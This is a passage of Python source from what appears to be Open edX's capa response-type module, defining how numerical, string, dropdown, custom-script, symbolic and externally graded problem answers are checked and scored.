msg = _("Choicegroup must include at least 1 correct and 1 incorrect choice")
raise LoncapaProblemError(msg)
# Limit the number of incorrect choices to what we actually have
num_incorrect = num_pool - 1
num_incorrect = min(num_incorrect, len(incorrect_choices))
# Select the one correct choice
index = rng.randint(0, len(correct_choices) - 1)
correct_choice = correct_choices[index]
solution_id = correct_choice.get('explanation-id')
# Put together the result, pushing most of the work onto rng.shuffle()
subset_choices = [correct_choice]
rng.shuffle(incorrect_choices)
subset_choices += incorrect_choices[:num_incorrect]
rng.shuffle(subset_choices)
return (solution_id, subset_choices)
@registry.register
class TrueFalseResponse(MultipleChoiceResponse):
human_name = _('True/False Choice')
tags = ['truefalseresponse']
def mc_setup_response(self):
i = 0
for response in self.xml.xpath("choicegroup"):
response.set("type", "TrueFalse")
for choice in list(response):
if choice.get("name") is None:
choice.set("name", "choice_" + str(i))
i += 1
else:
choice.set("name", "choice_" + choice.get("name"))
def get_score(self, student_answers):
correct = set(self.correct_choices)
answers = set(student_answers.get(self.answer_id, []))
if correct == answers:
return CorrectMap(self.answer_id, 'correct')
return CorrectMap(self.answer_id, 'incorrect')
#-----------------------------------------------------------------------------
@registry.register
class OptionResponse(LoncapaResponse):
"""
TODO: handle direction and randomize
"""
human_name = _('Dropdown')
tags = ['optionresponse']
hint_tag = 'optionhint'
allowed_inputfields = ['optioninput']
answer_fields = None
def setup_response(self):
self.answer_fields = self.inputfields
def get_score(self, student_answers):
# log.debug('%s: student_answers=%s' % (unicode(self),student_answers))
cmap = CorrectMap()
amap = self.get_answers()
for aid in amap:
if aid in student_answers and student_answers[aid] == amap[aid]:
cmap.set(aid, 'correct')
else:
cmap.set(aid, 'incorrect')
answer_variable = self.get_student_answer_variable_name(student_answers, aid)
if answer_variable:
cmap.set_property(aid, 'answervariable', answer_variable)
return cmap
def get_answers(self):
amap = dict([(af.get('id'), contextualize_text(af.get(
'correct'), self.context)) for af in self.answer_fields])
# log.debug('%s: expected answers=%s' % (unicode(self),amap))
return amap
def get_student_answer_variable_name(self, student_answers, aid):
"""
Return student answers variable name if exist in context else None.
"""
if aid in student_answers:
for key, val in self.context.iteritems():
# convert val into unicode because student answer always be a unicode string
# even it is a list, dict etc.
if unicode(val) == student_answers[aid]:
return '$' + key
return None
#-----------------------------------------------------------------------------
@registry.register
class NumericalResponse(LoncapaResponse):
"""
This response type expects a number or formulaic expression that evaluates
to a number (e.g. `4+5/2^2`), and accepts with a tolerance.
"""
human_name = _('Numerical Input')
tags = ['numericalresponse']
hint_tag = 'numericalhint'
allowed_inputfields = ['textline', 'formulaequationinput']
required_attributes = ['answer']
max_inputfields = 1
def __init__(self, *args, **kwargs):
self.correct_answer = ''
self.tolerance = default_tolerance
self.range_tolerance = False
self.answer_range = self.inclusion = None
super(NumericalResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
context = self.context
answer = xml.get('answer')
if answer.startswith(('[', '(')) and answer.endswith((']', ')')): # range tolerance case
self.range_tolerance = True
self.inclusion = (
True if answer.startswith('[') else False, True if answer.endswith(']') else False
)
try:
self.answer_range = [contextualize_text(x, context) for x in answer[1:-1].split(',')]
self.correct_answer = answer[0] + self.answer_range[0] + ', ' + self.answer_range[1] + answer[-1]
except Exception:
log.debug("Content error--answer '%s' is not a valid range tolerance answer", answer)
_ = self.capa_system.i18n.ugettext
raise StudentInputError(
_("There was a problem with the staff answer to this problem.")
)
else:
self.correct_answer = contextualize_text(answer, context)
# Find the tolerance
tolerance_xml = xml.xpath(
'//*[@id=$id]//responseparam[@type="tolerance"]/@default',
id=xml.get('id')
)
if tolerance_xml: # If it isn't an empty list...
self.tolerance = contextualize_text(tolerance_xml[0], context)
def get_staff_ans(self, answer):
"""
Given the staff answer as a string, find its float value.
Use `evaluator` for this, but for backward compatability, try the
built-in method `complex` (which used to be the standard).
"""
try:
correct_ans = complex(answer)
except ValueError:
# When `correct_answer` is not of the form X+Yj, it raises a
# `ValueError`. Then test if instead it is a math expression.
# `complex` seems to only generate `ValueErrors`, only catch these.
try:
correct_ans = evaluator({}, {}, answer)
except Exception:
log.debug("Content error--answer '%s' is not a valid number", answer)
_ = self.capa_system.i18n.ugettext
raise StudentInputError(
_("There was a problem with the staff answer to this problem.")
)
return correct_ans
def get_score(self, student_answers):
"""
Grade a numeric response.
"""
student_answer = student_answers[self.answer_id]
_ = self.capa_system.i18n.ugettext
general_exception = StudentInputError(
_(u"Could not interpret '{student_answer}' as a number.").format(student_answer=cgi.escape(student_answer))
)
# Begin `evaluator` block
# Catch a bunch of exceptions and give nicer messages to the student.
try:
student_float = evaluator({}, {}, student_answer)
except UndefinedVariable as undef_var:
raise StudentInputError(
_(u"You may not use variables ({bad_variables}) in numerical problems.").format(bad_variables=undef_var.message)
)
except ValueError as val_err:
if 'factorial' in val_err.message:
# This is thrown when fact() or factorial() is used in an answer
# that evaluates on negative and/or non-integer inputs
# ve.message will be: `factorial() only accepts integral values` or
# `factorial() not defined for negative values`
raise StudentInputError(
_("factorial function evaluated outside its domain:"
"'{student_answer}'").format(student_answer=cgi.escape(student_answer))
)
else:
raise general_exception
except ParseException:
raise StudentInputError(
_(u"Invalid math syntax: '{student_answer}'").format(student_answer=cgi.escape(student_answer))
)
except Exception:
raise general_exception
# End `evaluator` block -- we figured out the student's answer!
if self.range_tolerance:
if isinstance(student_float, complex):
raise StudentInputError(_(u"You may not use complex numbers in range tolerance problems"))
boundaries = []
for inclusion, answer in zip(self.inclusion, self.answer_range):
boundary = self.get_staff_ans(answer)
if boundary.imag != 0:
# Translators: This is an error message for a math problem. If the instructor provided a boundary
# (end limit) for a variable that is a complex number (a + bi), this message displays.
raise StudentInputError(_("There was a problem with the staff answer to this problem: complex boundary."))
if isnan(boundary):
# Translators: This is an error message for a math problem. If the instructor did not provide
# a boundary (end limit) for a variable, this message displays.
raise StudentInputError(_("There was a problem with the staff answer to this problem: empty boundary."))
boundaries.append(boundary.real)
if compare_with_tolerance(
student_float,
boundary,
tolerance=float_info.epsilon,
relative_tolerance=True
):
correct = inclusion
break
else:
correct = boundaries[0] < student_float < boundaries[1]
else:
correct_float = self.get_staff_ans(self.correct_answer)
correct = compare_with_tolerance(
student_float, correct_float, self.tolerance
)
if correct:
return CorrectMap(self.answer_id, 'correct')
else:
return CorrectMap(self.answer_id, 'incorrect')
def compare_answer(self, ans1, ans2):
"""
Outside-facing function that lets us compare two numerical answers,
with this problem's tolerance.
"""
return compare_with_tolerance(
evaluator({}, {}, ans1),
evaluator({}, {}, ans2),
self.tolerance
)
def validate_answer(self, answer):
"""
Returns whether this answer is in a valid form.
"""
try:
evaluator(dict(), dict(), answer)
return True
except (StudentInputError, UndefinedVariable):
return False
def get_answers(self):
return {self.answer_id: self.correct_answer}
#-----------------------------------------------------------------------------
@registry.register
class StringResponse(LoncapaResponse):
"""
This response type allows one or more answers.
Additional answers are added by `additional_answer` tag.
If `regexp` is in `type` attribute, than answers and hints are treated as regular expressions.
Examples:
<stringresponse answer="Michigan">
<textline size="20" />
</stringresponse >
<stringresponse answer="a1" type="ci regexp">
<additional_answer>\d5</additional_answer>
<additional_answer>a3</additional_answer>
<textline size="20"/>
<hintgroup>
<stringhint answer="a0" type="ci" name="ha0" />
<stringhint answer="a4" type="ci" name="ha4" />
<stringhint answer="^\d" type="ci" name="re1" />
<hintpart on="ha0">
<startouttext />+1<endouttext />
</hintpart >
<hintpart on="ha4">
<startouttext />-1<endouttext />
</hintpart >
<hintpart on="re1">
<startouttext />Any number+5<endouttext />
</hintpart >
</hintgroup>
</stringresponse>
"""
human_name = _('Text Input')
tags = ['stringresponse']
hint_tag = 'stringhint'
allowed_inputfields = ['textline']
required_attributes = ['answer']
max_inputfields = 1
correct_answer = []
def setup_response_backward(self):
self.correct_answer = [
contextualize_text(answer, self.context).strip() for answer in self.xml.get('answer').split('_or_')
]
def setup_response(self):
self.backward = '_or_' in self.xml.get('answer').lower()
self.regexp = False
self.case_insensitive = False
if self.xml.get('type') is not None:
self.regexp = 'regexp' in self.xml.get('type').lower().split(' ')
self.case_insensitive = 'ci' in self.xml.get('type').lower().split(' ')
# backward compatibility, can be removed in future, it is up to @Lyla Fisher.
if self.backward:
self.setup_response_backward()
return
# end of backward compatibility
correct_answers = [self.xml.get('answer')] + [el.text for el in self.xml.findall('additional_answer')]
self.correct_answer = [contextualize_text(answer, self.context).strip() for answer in correct_answers]
# remove additional_answer from xml, otherwise they will be displayed
for el in self.xml.findall('additional_answer'):
self.xml.remove(el)
def get_score(self, student_answers):
"""Grade a string response """
student_answer = student_answers[self.answer_id].strip()
correct = self.check_string(self.correct_answer, student_answer)
return CorrectMap(self.answer_id, 'correct' if correct else 'incorrect')
def check_string_backward(self, expected, given):
if self.case_insensitive:
return given.lower() in [i.lower() for i in expected]
return given in expected
def check_string(self, expected, given):
"""
Find given in expected.
If self.regexp is true, regular expression search is used.
if self.case_insensitive is true, case insensitive search is used, otherwise case sensitive search is used.
Spaces around values of attributes are stripped in XML parsing step.
Args:
expected: list.
given: str.
Returns: bool
Raises: `ResponseError` if it fails to compile regular expression.
Note: for old code, which supports _or_ separator, we add some backward compatibility handling.
Should be removed soon. When to remove it, is up to Lyla Fisher.
"""
_ = self.capa_system.i18n.ugettext
# backward compatibility, should be removed in future.
if self.backward:
return self.check_string_backward(expected, given)
# end of backward compatibility
if self.regexp: # regexp match
flags = re.IGNORECASE if self.case_insensitive else 0
try:
regexp = re.compile('^' + '|'.join(expected) + '$', flags=flags | re.UNICODE)
result = re.search(regexp, given)
except Exception as err:
msg = u'[courseware.capa.responsetypes.stringresponse] {error}: {message}'.format(
error=_('error'),
message=err.message
)
log.error(msg, exc_info=True)
raise ResponseError(msg)
return bool(result)
else: # string match
if self.case_insensitive:
return given.lower() in [i.lower() for i in expected]
else:
return given in expected
def check_hint_condition(self, hxml_set, student_answers):
given = student_answers[self.answer_id].strip()
hints_to_show = []
for hxml in hxml_set:
name = hxml.get('name')
hinted_answer = contextualize_text(hxml.get('answer'), self.context).strip()
if self.check_string([hinted_answer], given):
hints_to_show.append(name)
log.debug('hints_to_show = %s', hints_to_show)
return hints_to_show
def get_answers(self):
_ = self.capa_system.i18n.ugettext
# Translators: Separator used in StringResponse to display multiple answers. Example: "Answer: Answer_1 or Answer_2 or Answer_3".
separator = u' <b>{}</b> '.format(_('or'))
return {self.answer_id: separator.join(self.correct_answer)}
#-----------------------------------------------------------------------------
@registry.register
class CustomResponse(LoncapaResponse):
"""
Custom response. The python code to be run should be in <answer>...</answer>
or in a <script>...</script>
"""
human_name = _('Custom Evaluated Script')
tags = ['customresponse']
allowed_inputfields = ['textline', 'textbox', 'crystallography',
'chemicalequationinput', 'vsepr_input',
'drag_and_drop_input', 'editamoleculeinput',
'designprotein2dinput', 'editageneinput',
'annotationinput', 'jsinput', 'formulaequationinput']
code = None
expect = None
def setup_response(self):
xml = self.xml
# if <customresponse> has an "expect" (or "answer") attribute then save
# that
self.expect = xml.get('expect') or xml.get('answer')
log.debug('answer_ids=%s', self.answer_ids)
# the <answer>...</answer> stanza should be local to the current <customresponse>.
# So try looking there first.
self.code = None
answer = None
try:
answer = xml.xpath('//*[@id=$id]//answer', id=xml.get('id'))[0]
except IndexError:
# print "xml = ",etree.tostring(xml,pretty_print=True)
# if we have a "cfn" attribute then look for the function specified by cfn, in
# the problem context ie the comparison function is defined in the
# <script>...</script> stanza instead
cfn = xml.get('cfn')
if cfn:
log.debug("cfn = %s", cfn)
# This is a bit twisty. We used to grab the cfn function from
# the context, but now that we sandbox Python execution, we
# can't get functions from previous executions. So we make an
# actual function that will re-execute the original script,
# and invoke the function with the data needed.
def make_check_function(script_code, cfn):
def check_function(expect, ans, **kwargs):
extra_args = "".join(", {0}={0}".format(k) for k in kwargs)
code = (
script_code + "\n" +
"cfn_return = %s(expect, ans%s)\n" % (cfn, extra_args)
)
globals_dict = {
'expect': expect,
'ans': ans,
}
globals_dict.update(kwargs)
safe_exec.safe_exec(
code,
globals_dict,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
return globals_dict['cfn_return']
return check_function
self.code = make_check_function(self.context['script_code'], cfn)
if not self.code:
if answer is None:
log.error("[courseware.capa.responsetypes.customresponse] missing"
" code checking script! id=%s", self.id)
self.code = ''
else:
answer_src = answer.get('src')
if answer_src is not None:
# TODO: this code seems not to be used any more since self.capa_system.filesystem doesn't exist.
self.code = self.capa_system.filesystem.open('src/' + answer_src).read()
else:
self.code = answer.text
def get_score(self, student_answers):
"""
student_answers is a dict with everything from request.POST, but with the first part
of each key removed (the string before the first "_").
"""
_ = self.capa_system.i18n.ugettext
log.debug('%s: student_answers=%s', unicode(self), student_answers)
# ordered list of answer id's
# sort the responses on the bases of the problem's position number
# which can be found in the last place in the problem id. Then convert
# this number into an int, so that we sort on ints instead of strings
idset = sorted(self.answer_ids, key=lambda x: int(x.split("_")[-1]))
try:
# ordered list of answers
submission = [student_answers[k] for k in idset]
except Exception as err:
msg = u"[courseware.capa.responsetypes.customresponse] {message}\n idset = {idset}, error = {err}".format(
message=_("error getting student answer from {student_answers}").format(student_answers=student_answers),
idset=idset,
err=err
)
log.error(
"[courseware.capa.responsetypes.customresponse] error getting"
" student answer from %s"
"\n idset = %s, error = %s",
student_answers, idset, err
)
raise Exception(msg)
# global variable in context which holds the Presentation MathML from dynamic math input
# ordered list of dynamath responses
dynamath = [student_answers.get(k + '_dynamath', None) for k in idset]
# if there is only one box, and it's empty, then don't evaluate
if len(idset) == 1 and not submission[0]:
# default to no error message on empty answer (to be consistent with other
# responsetypes) but allow author to still have the old behavior by setting
# empty_answer_err attribute
msg = (u'<span class="inline-error">{0}</span>'.format(_(u'No answer entered!'))
if self.xml.get('empty_answer_err') else '')
return CorrectMap(idset[0], 'incorrect', msg=msg)
# NOTE: correct = 'unknown' could be dangerous. Inputtypes such as textline are
# not expecting 'unknown's
correct = ['unknown'] * len(idset)
messages = [''] * len(idset)
overall_message = ""
# put these in the context of the check function evaluator
# note that this doesn't help the "cfn" version - only the exec version
self.context.update({
# my ID
'response_id': self.id,
# expected answer (if given as attribute)
'expect': self.expect,
# ordered list of student answers from entry boxes in our subtree
'submission': submission,
# ordered list of ID's of all entry boxes in our subtree
'idset': idset,
# ordered list of all javascript inputs in our subtree
'dynamath': dynamath,
# dict of student's responses, with keys being entry box IDs
'answers': student_answers,
# the list to be filled in by the check function
'correct': correct,
# the list of messages to be filled in by the check function
'messages': messages,
# a message that applies to the entire response
# instead of a particular input
'overall_message': overall_message,
# any options to be passed to the cfn
'options': self.xml.get('options'),
'testdat': 'hello world',
})
# Pass DEBUG to the check function.
self.context['debug'] = self.capa_system.DEBUG
# Run the check function
self.execute_check_function(idset, submission)
# build map giving "correct"ness of the answer(s)
correct = self.context['correct']
messages = self.context['messages']
overall_message = self.clean_message_html(self.context['overall_message'])
grade_decimals = self.context.get('grade_decimals')
correct_map = CorrectMap()
correct_map.set_overall_message(overall_message)
for k in range(len(idset)):
max_points = self.maxpoints[idset[k]]
if grade_decimals:
npoints = max_points * grade_decimals[k]
else:
npoints = max_points if correct[k] == 'correct' else 0
correct_map.set(idset[k], correct[k], msg=messages[k],
npoints=npoints)
return correct_map
def execute_check_function(self, idset, submission):
# exec the check function
if isinstance(self.code, basestring):
try:
safe_exec.safe_exec(
self.code,
self.context,
cache=self.capa_system.cache,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
self._handle_exec_exception(err)
else:
# self.code is not a string; it's a function we created earlier.
# this is an interface to the Tutor2 check functions
fn = self.code
answer_given = submission[0] if (len(idset) == 1) else submission
kwnames = self.xml.get("cfn_extra_args", "").split()
kwargs = {n: self.context.get(n) for n in kwnames}
log.debug(" submission = %s", submission)
try:
ret = fn(self.expect, answer_given, **kwargs)
except Exception as err: # pylint: disable=broad-except
self._handle_exec_exception(err)
log.debug(
"[courseware.capa.responsetypes.customresponse.get_score] ret = %s",
ret
)
if isinstance(ret, dict):
# One kind of dictionary the check function can return has the
# form {'ok': BOOLEAN, 'msg': STRING, 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)}
# 'ok' will control the checkmark, while grade_decimal, if present, will scale
# the score the student receives on the response.
# If there are multiple inputs, they all get marked
# to the same correct/incorrect value
if 'ok' in ret:
correct = ['correct' if ret['ok'] else 'incorrect'] * len(idset)
msg = ret.get('msg', None)
msg = self.clean_message_html(msg)
# If there is only one input, apply the message to that input
# Otherwise, apply the message to the whole problem
if len(idset) > 1:
self.context['overall_message'] = msg
else:
self.context['messages'][0] = msg
if 'grade_decimal' in ret:
decimal = ret['grade_decimal']
else:
decimal = 1.0 if ret['ok'] else 0.0
grade_decimals = [decimal] * len(idset)
self.context['grade_decimals'] = grade_decimals
# Another kind of dictionary the check function can return has
# the form:
# { 'overall_message': STRING,
# 'input_list': [
# { 'ok': BOOLEAN, 'msg': STRING, 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)},
# ...
# ]
# }
# 'ok' will control the checkmark, while grade_decimal, if present, will scale
# the score the student receives on the response.
#
# This allows the function to return an 'overall message'
# that applies to the entire problem, as well as correct/incorrect
# status, scaled grades, and messages for individual inputs
elif 'input_list' in ret:
overall_message = ret.get('overall_message', '')
input_list = ret['input_list']
correct = []
messages = []
grade_decimals = []
for input_dict in input_list:
correct.append('correct'
if input_dict['ok'] else 'incorrect')
msg = (self.clean_message_html(input_dict['msg'])
if 'msg' in input_dict else None)
messages.append(msg)
if 'grade_decimal' in input_dict:
decimal = input_dict['grade_decimal']
else:
decimal = 1.0 if input_dict['ok'] else 0.0
grade_decimals.append(decimal)
self.context['messages'] = messages
self.context['overall_message'] = overall_message
self.context['grade_decimals'] = grade_decimals
# Otherwise, we do not recognize the dictionary
# Raise an exception
else:
log.error(traceback.format_exc())
_ = self.capa_system.i18n.ugettext
raise ResponseError(
_("CustomResponse: check function returned an invalid dictionary!")
)
else:
correct = ['correct' if ret else 'incorrect'] * len(idset)
self.context['correct'] = correct
def clean_message_html(self, msg):
# If *msg* is an empty string, then the code below
# will return "</html>". To avoid this, we first check
# that *msg* is a non-empty string.
if msg:
# When we parse *msg* using etree, there needs to be a root
# element, so we wrap the *msg* text in <html> tags
msg = '<html>' + msg + '</html>'
# Replace < characters
msg = msg.replace('<', '<')
# Use etree to prettify the HTML
msg = etree.tostring(fromstring_bs(msg, convertEntities=None),
pretty_print=True)
msg = msg.replace(' ', '')
# Remove the <html> tags we introduced earlier, so we're
# left with just the prettified message markup
msg = re.sub('(?ms)<html>(.*)</html>', '\\1', msg)
# Strip leading and trailing whitespace
return msg.strip()
# If we start with an empty string, then return an empty string
else:
return ""
def get_answers(self):
"""
Give correct answer expected for this response.
use default_answer_map from entry elements (eg textline),
when this response has multiple entry objects.
but for simplicity, if an "expect" attribute was given by the content author
ie <customresponse expect="foo" ...> then that.
"""
if len(self.answer_ids) > 1:
return self.default_answer_map
if self.expect:
return {self.answer_ids[0]: self.expect}
return self.default_answer_map
def _handle_exec_exception(self, err):
"""
Handle an exception raised during the execution of
custom Python code.
Raises a ResponseError
"""
# Log the error if we are debugging
msg = 'Error occurred while evaluating CustomResponse'
log.warning(msg, exc_info=True)
# Notify student with a student input error
_, _, traceback_obj = sys.exc_info()
raise ResponseError(err.message, traceback_obj)
#-----------------------------------------------------------------------------
@registry.register
class SymbolicResponse(CustomResponse):
"""
Symbolic math response checking, using symmath library.
"""
human_name = _('Symbolic Math Input')
tags = ['symbolicresponse']
max_inputfields = 1
def setup_response(self):
# Symbolic response always uses symmath_check()
# If the XML did not specify this, then set it now
# Otherwise, we get an error from the superclass
self.xml.set('cfn', 'symmath_check')
# Let CustomResponse do its setup
super(SymbolicResponse, self).setup_response()
def execute_check_function(self, idset, submission):
from symmath import symmath_check
try:
# Since we have limited max_inputfields to 1,
# we can assume that there is only one submission
answer_given = submission[0]
ret = symmath_check(
self.expect, answer_given,
dynamath=self.context.get('dynamath'),
options=self.context.get('options'),
debug=self.context.get('debug'),
)
except Exception as err:
log.error("oops in SymbolicResponse (cfn) error %s", err)
log.error(traceback.format_exc())
_ = self.capa_system.i18n.ugettext
# Translators: 'SymbolicResponse' is a problem type and should not be translated.
msg = _(u"An error occurred with SymbolicResponse. The error was: {error_msg}").format(
error_msg=err,
)
raise Exception(msg)
self.context['messages'][0] = self.clean_message_html(ret['msg'])
self.context['correct'] = ['correct' if ret['ok'] else 'incorrect'] * len(idset)
#-----------------------------------------------------------------------------
## ScoreMessage named tuple ##
## valid: Flag indicating valid score_msg format (Boolean)
## correct: Correctness of submission (Boolean)
## score: Points to be assigned (numeric, can be float)
## msg: Message from grader to display to student (string)
ScoreMessage = namedtuple('ScoreMessage', ['valid', 'correct', 'points', 'msg']) # pylint: disable=invalid-name
@registry.register
class CodeResponse(LoncapaResponse):
"""
Grade student code using an external queueing server, called 'xqueue'.
Expects 'xqueue' dict in LoncapaSystem with the following keys that are
needed by CodeResponse::
capa_system.xqueue = {
'interface': XQueueInterface object.
'construct_callback': Per-StudentModule callback URL constructor,
defaults to using 'score_update' as the correct dispatch (function).
'default_queuename': Default queue name to submit request (string).
}
External requests are only submitted for student submission grading, not
for getting reference answers.
"""
human_name = _('Code Input')
tags = ['coderesponse']
allowed_inputfields = ['textbox', 'filesubmission', 'matlabinput']
max_inputfields = 1
payload = None
initial_display = None
url = None
answer = None
queue_name = None
def setup_response(self):
"""
Configure CodeResponse from XML. Supports both CodeResponse and ExternalResponse XML
TODO: Determines whether in synchronous or asynchronous (queued) mode
"""
xml = self.xml
# TODO: XML can override external resource (grader/queue) URL
self.url = xml.get('url', None)
# We do not support xqueue within Studio.
if self.capa_system.xqueue is not None:
default_queuename = self.capa_system.xqueue['default_queuename']
else:
default_queuename = None
self.queue_name = xml.get('queuename', default_queuename)
# VS[compat]:
# Check if XML uses the ExternalResponse format or the generic
# CodeResponse format
codeparam = self.xml.find('codeparam')
assert codeparam is not None, "Unsupported old format! <coderesponse> without <codeparam>"
self._parse_coderesponse_xml(codeparam)
def _parse_coderesponse_xml(self, codeparam):
"""
Parse the new CodeResponse XML format. When successful, sets:
self.initial_display
self.answer (an answer to display to the student in the LMS)
self.payload
"""
grader_payload = codeparam.find('grader_payload')
grader_payload = grader_payload.text if grader_payload is not None else ''
self.payload = {
'grader_payload': grader_payload,
}
# matlab api key can be defined in course settings. if so, add it to the grader payload
api_key = getattr(self.capa_system, 'matlab_api_key', None)
if api_key and self.xml.find('matlabinput') is not None:
self.payload['token'] = api_key
self.payload['endpoint_version'] = "2"
self.payload['requestor_id'] = self.capa_system.anonymous_student_id
self.initial_display = find_with_default(
codeparam, 'initial_display', '')
_ = self.capa_system.i18n.ugettext
self.answer = find_with_default(codeparam, 'answer_display',
_(u'No answer provided.'))
def get_score(self, student_answers):
_ = self.capa_system.i18n.ugettext
try:
# Note that submission can be a file
submission = student_answers[self.answer_id]
except Exception as err:
log.error(
'Error in CodeResponse %s: cannot get student answer for %s;'
' student_answers=%s',
err, self.answer_id, convert_files_to_filenames(student_answers)
)
raise Exception(err)
# We do not support xqueue within Studio.
if self.capa_system.xqueue is None:
cmap = CorrectMap()
cmap.set(self.answer_id, queuestate=None,
msg=_(u'Error: No grader has been set up for this problem.'))
return cmap
# Prepare xqueue request
#------------------------------------------------------------
qinterface = self.capa_system.xqueue['interface']
qtime = datetime.strftime(datetime.now(UTC), xqueue_interface.dateformat)
anonymous_student_id = self.capa_system.anonymous_student_id
# Generate header
queuekey = xqueue_interface.make_hashkey(
str(self.capa_system.seed) + qtime + anonymous_student_id + self.answer_id
)
callback_url = self.capa_system.xqueue['construct_callback']()
xheader = xqueue_interface.make_xheader(
lms_callback_url=callback_url,
lms_key=queuekey,
queue_name=self.queue_name
)
# Generate body
if is_list_of_files(submission):
# TODO: Get S3 pointer from the Queue
self.context.update({'submission': ''})
else:
self.context.update({'submission': submission})
contents = self.payload.copy()
# Metadata related to the student submission revealed to the external
# grader
student_info = {
'anonymous_student_id': anonymous_student_id,
'submission_time': qtime,
}
contents.update({'student_info': json.dumps(student_info)})
# Submit request. When successful, 'msg' is the prior length of the
# queue
if is_list_of_files(submission):
# TODO: Is there any information we want to send here?
contents.update({'student_response': ''})
(error, msg) = qinterface.send_to_queue(header=xheader,
body=json.dumps(contents),
files_to_upload=submission)
else:
contents.update({'student_response': submission})
(error, msg) = qinterface.send_to_queue(header=xheader,
body=json.dumps(contents))
# State associated with the queueing request
queuestate = {'key': queuekey,
'time': qtime, }
cmap = CorrectMap()
if error:
_ = self.capa_system.i18n.ugettext
error_msg = _('Unable to deliver your submission to grader (Reason: {error_msg}).'
' Please try again later.').format(error_msg=msg)
cmap.set(self.answer_id, queuestate=None, msg=error_msg)
else:
# Queueing mechanism flags:
# 1) Backend: Non-null CorrectMap['queuestate'] indicates that
# the problem has been queued
# 2) Frontend: correctness='incomplete' eventually trickles down
# through inputtypes.textbox and .filesubmission to inform the
# browser to poll the LMS
cmap.set(self.answer_id, queuestate=queuestate,
correctness='incomplete', msg=msg)
return cmap
def update_score(self, score_msg, oldcmap, queuekey):
"""Updates the user's score based on the returned message from the grader."""
(valid_score_msg, correct, points, msg) = self._parse_score_msg(score_msg)
_ = self.capa_system.i18n.ugettext
dog_stats_api.increment(xqueue_interface.XQUEUE_METRIC_NAME, tags=[
'action:update_score',
'correct:{}'.format(correct)
])
dog_stats_api.histogram(xqueue_interface.XQUEUE_METRIC_NAME + '.update_score.points_earned', points)
if not valid_score_msg:
# Translators: 'grader' refers to the edX automatic code grader.
error_msg = _('Invalid grader reply. Please contact the course staff.')
oldcmap.set(self.answer_id, msg=error_msg)
return oldcmap
correctness = 'correct' if correct else 'incorrect'
# TODO: Find out how this is used elsewhere, if any
self.context['correct'] = correctness
# Replace 'oldcmap' with new grading results if queuekey matches. If queuekey
# does not match, we keep waiting for the score_msg whose key actually
# matches
if oldcmap.is_right_queuekey(self.answer_id, queuekey):
# Sanity check on returned points
if points < 0:
points = 0
# Queuestate is consumed
oldcmap.set(
self.answer_id, npoints=points, correctness=correctness,
msg=msg.replace(' ', ' '), queuestate=None)
else:
log.debug(
'CodeResponse: queuekey %s does not match for answer_id=%s.',
queuekey,
self.answer_id
)
return oldcmap
def get_answers(self):
anshtml = '<span class="code-answer"><pre><code>%s</code></pre></span>' % self.answer
return {self.answer_id: anshtml}
def get_initial_display(self):
"""
The course author can specify an initial display
to be displayed the code response box.
"""
return {self.answer_id: self.initial_display}
def _parse_score_msg(self, score_msg):
"""
Grader reply is a JSON-dump of the following dict
{ 'correct': True/False,
'score': Numeric value (floating point is okay) to assign to answer
'msg': grader_msg }
Returns (valid_score_msg, correct, score, msg):
valid_score_msg: Flag indicating valid score_msg format (Boolean)
correct: Correctness of submission (Boolean)
score: Points to be assigned (numeric, can be float)
msg: Message from grader to display to student (string)
"""
fail = (False, False, 0, '')
try:
score_result = json.loads(score_msg)
except (TypeError, ValueError):
log.error("External grader message should be a JSON-serialized dict."
" Received score_msg = %s", score_msg)
return fail
if not isinstance(score_result, dict):
log.error("External grader message should be a JSON-serialized dict."
" Received score_result = %s", score_result)
return fail
for tag in ['correct', 'score', 'msg']:
if tag not in score_result:
log.error("External grader message is missing one or more required"
" tags: 'correct', 'score', 'msg'")
return fail
# Next, we need to check that the contents of the external grader message is safe for the LMS.
# 1) Make sure that the message is valid XML (proper opening/closing tags)
# 2) If it is not valid XML, make sure it is valid HTML. Note: html5lib parser will try to repair any broken HTML
# For example: <aaa></bbb> will become <aaa/>.
msg = score_result['msg']
try:
etree.fromstring(msg)
except etree.XMLSyntaxError as _err:
# If `html` contains attrs with no values, like `controls` in <audio controls src='smth'/>,
# XML parser will raise exception, so wee fallback to html5parser, which will set empty "" values for such attrs.
try:
parsed = html5lib.parseFragment(msg, treebuilder='lxml', namespaceHTMLElements=False)
except ValueError:
# the parsed message might contain strings that are not
# xml compatible, in which case, throw the error message
parsed = False
if not parsed:
log.error(
"Unable to parse external grader message as valid"
" XML: score_msg['msg']=%s",
msg,
)
return fail
return (True, score_result['correct'], score_result['score'], msg)
#-----------------------------------------------------------------------------
@registry.register
class ExternalResponse(LoncapaResponse):
"""
Grade the students input using an external server.
Typically used by coding problems.
"""
human_name = _('External Grader')
tags = ['externalresponse']
allowed_inputfields = ['textline', 'textbox']
awdmap = {
'EXACT_ANS': 'correct', # TODO: handle other loncapa responses
'WRONG_FORMAT': 'incorrect',
}
def __init__(self, *args, **kwargs):
self.url = ''
self.tests = []
self.code = ''
super(ExternalResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
# FIXME - hardcoded URL
self.url = xml.get('url') or "http://qisx.mit.edu:8889/pyloncapa"
answer = xml.find('answer')
if answer is not None:
answer_src = answer.get('src')
if answer_src is not None:
# TODO: this code seems not to be used any more since self.capa_system.filesystem doesn't exist.
self.code = self.capa_system.filesystem.open('src/' + answer_src).read()
else:
self.code = answer.text
else:
# no <answer> stanza; get code from <script>
self.code = self.context['script_code']
if not self.code:
msg = '%s: Missing answer script code for externalresponse' % unicode(
self)
msg += "\nSee XML source line %s" % getattr(
self.xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
self.tests = xml.get('tests')
def do_external_request(self, cmd, extra_payload):
"""
Perform HTTP request / post to external server.
cmd = remote command to perform (str)
extra_payload = dict of extra stuff to post.
Return XML tree of response (from response body)
"""
xmlstr = etree.tostring(self.xml, pretty_print=True)
payload = {
'xml': xmlstr,
'edX_cmd': cmd,
'edX_tests': self.tests,
'processor': self.code,
}
payload.update(extra_payload)
try:
# call external server. TODO: synchronous call, can block for a
# long time
